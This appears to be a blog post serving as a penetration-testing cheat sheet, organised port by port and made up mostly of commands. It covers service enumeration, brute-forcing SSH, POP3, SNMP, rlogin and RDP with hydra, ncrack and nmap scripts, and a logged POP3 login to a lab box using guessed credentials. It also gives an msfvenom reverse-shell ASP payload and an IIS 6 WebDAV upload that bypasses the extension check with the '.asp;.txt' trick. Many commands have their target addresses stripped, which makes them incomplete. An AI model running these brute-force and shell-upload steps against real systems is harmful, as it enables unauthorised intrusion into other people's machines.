Below is the Process. This is the process to follow based on the situation that presents itself during a Pentest.

Before assuming that the port is only listening on 1 service, use amap to check if multple services are running on the same port.

amap 12380

Protocol on matches http
Protocol on matches http-apache2
Protocol on matches ntp
Protocol on matches ssl

As we can see on port 12380 HTTP, NTP & SSL are running! we would of known this otherwise!
TCP Port 21
nmap -sV -sC -p 21
Banner grab - (nmap -v -p 21 -sV x.x.x.x --script=banner)

Try logging in Anonymously
lftp anonymous@IP
No Password (hit Enter)

nmap --script=ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-anon,ftp-libopie,,ftp-vuln-cve2010-4221,tftp-enum -p 21 -n -v -sV -Pn

TCP Port 22
How to use a differ key exchange? 


nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root
nmap -p 22 -n -v -sV -Pn --script ssh-hostkey 
nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt 


TCP Port 23

TCP Port 25
POP3 Enumeration

Check for usernmae enumeration

smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t

Test if VRFY is allowed..

telnet 25
Connected to
Escape character is '^]'.
501 HELO Invalid domain address.
250 Hello.
VRFY root
502 VRFY disallowed.
VRFY blah
502 VRFY disallowed.

================================================= TCP Port 53 - DNS Related testing... (WHEN OPEN THIS IS USUALLY TO FACILITATE ZONE TRANSFERS)

TCP port 53 is unusual because we normally see this on UDP 53.

> SERVER 'IP' - this command allows us to connect initially to the Name Server.

> - lets see what we get from local host

>'IP' try the IP of the box your are testing
>'' any host name that seems logical to the box that might help.

dnsrecon -r -n 'IP' IP can be or whatever you are testing

also try..
dnsrecon -r -n 'IP'

next try..
dnsrecon -r '' -n - This time we look at the entire /24. you can also try /16 and /8 as needed.

next try with dig and add the dns server address..
dig axfr @ (where is the DNS Server address)

next try
dig axfr @

dig axfr @

================================================== TCP PORT 79 - FINGER (What user have/are logged in to the system)

1) Download

1.1)perl -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt  -t | less -S

Getting the results can takes AGES! be PATIENT!
Also whilst waiting, you can run multiples so create a user.txt file and add in names that could be relevant based on other enumeration.

1.2) Once we have results we are looking for "pts/2" or "pts/3" (the terminal slthey logged into) also the Time and the address. This tells us that these names exist and are either currently logged in or have logged in recently.

================================================== TCP Port 80 (or any HTTP listening service)
nmap -sC -sV -A -p 80 ip
dirbuster first as this seem to give better performance
dirsearch - test with "-f" this can change the outcome of directories from 302's to 200's - Not sure Why but try it!

If all responses are returning '200 OK' then start to wfuzz. Go to Wfuzz page

if there is a /cgi-bin/ folder then search for .sh .py files!

Add a logical name into the 'hosts' file and re check the site.
Check for Webdav - nmap -T4 -p80 --script=http-iis-webdav-vuln
If sits run davtest - davtest -url
then CADAVAR - cadvar

if the site has extensions like (.php) then add the extension option in diresearch "-e" or dirb "-X" 

Test For HTTP PUT Method - curl -X OPTIONS http://IP:PORT -v

If PUT available..
Upload a file - curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/directory/to/file" http://IP:Port 
Read the source code? --> Any comments? --> Any hint to a WordPress or Joomla Site?

If Joomla - run JScan
If WordPress - WPSCAN --> Goto Wordpress Section

If the webpage doesnt finish with an extension (e.g.) http://test/index - then try phpfilters.

Got a login portal? Goto WEB LOGIN

TCP Port 110 - POP3 - Read Email with LIST Command
#Try to brute force the pop3 names
nmap -sV --script=pop3-brute

110/tcp open  pop3    JAMES pop3d 2.3.2
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 19457 guesses in 404 seconds, average tps: 47.2

|_  ERROR: Failed to connect.

root@kali:~# telnet 110
Connected to
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
PASS john
+OK Welcome john
+OK 1 743
1 743
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from ([])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.



TCP Port 111 - RPCBind
apt install nfs-common

  1. rpcinfo -p | grep nfs
  2. showmount -e
  3. If we get an output like..
  4. Export list for
    /home/vulnix *              
  5. The * indicates that any IP is allowed to connect.
  6. mount -t nfs /home/vulnix/ /mnt/whatever -nolock
  7. If we get a "Permission Denied" then this could be "root squashing" which means we cant access it basically.
TCP  Port 135 Remote Procedure Call
nbtstat -a 
nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smbv2-enabled,smb-vuln*
enum4linux -a
rpcclient -U ""
smbclient -L
smbclient \\\ipc$ -U administrator
smbclient //$ -U administrator
smbclient //$ -U administrator

TCP Port 137

TCP Port 139

TCP Port 161

nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat
onesixtyone -c communities.txt
snmp-check -t -c public
snmpwalk -c public -v 1 [MIB_TREE_VALUE]
hydra -P passwords.txt -v snmp


#SNMP MIB Trees System Processes Running Programs Processes Path Storage Units Software Name User Accounts TCP Local Ports
TCP Port 162

TCP Port 443

TCP Port 445
apt-get install smb4k -y
nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smbv2-enabled,smb-vuln*
enum4linux -a
rpcclient -U ""
smbclient -L
smbclient \\\ipc$ -U administrator
smbclient //$ -U administrator
smbclient //$ -U administrator

TCP Ports 512,513,514
apt-get install rsh-client

#Try to login with the root user or a user found already.
rlogin -l root

#If not try to brute - output is slow but will come.
nmap -p 513 --script rlogin-brute -v 

TCP Port 3306

nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122
mysql --host= -u root -p 
TCP Port 3389

ncrack -vv --user administrator -P passwords.txt rdp://,CL=1

POP3 Enumeration - Enumerate USERNAMES
smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t

IIS6.0 Server 2003 ASP File Upload
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f asp --arch x86 --platform windows > shell_reverse_tcp.asp

dav:/> put shell_reverse_tcp.txt                                                                        │
Uploading shell_reverse_tcp.txt to `/shell_reverse_tcp.txt':                                            │
Progress: [=============================>] 100.0% of 38349 bytes succeeded.                             │
dav:/> copy shell_reverse_tcp.txt shell_reverse_tcp.asp;.txt                                            │
Copying `/shell_reverse_tcp.txt' to `/shell_reverse_tcp.asp%3b.txt':  succeeded.                        │

Image Files

exiftool -a -u -g1 FILENAME
binwalk -ME FILENAME

Using Put to create a shell with  IIS 6 - Create payload then upload it and switch names to .txt form there copy it to .asp;.txt

Opening Database Files
-SDF files can be opened with SQL Query Compact Analyser;
-MDF files can be opened with SQL MDF Viewer

found an LFI? or want to test for LFI use lfisuite

No comments:

Post a Comment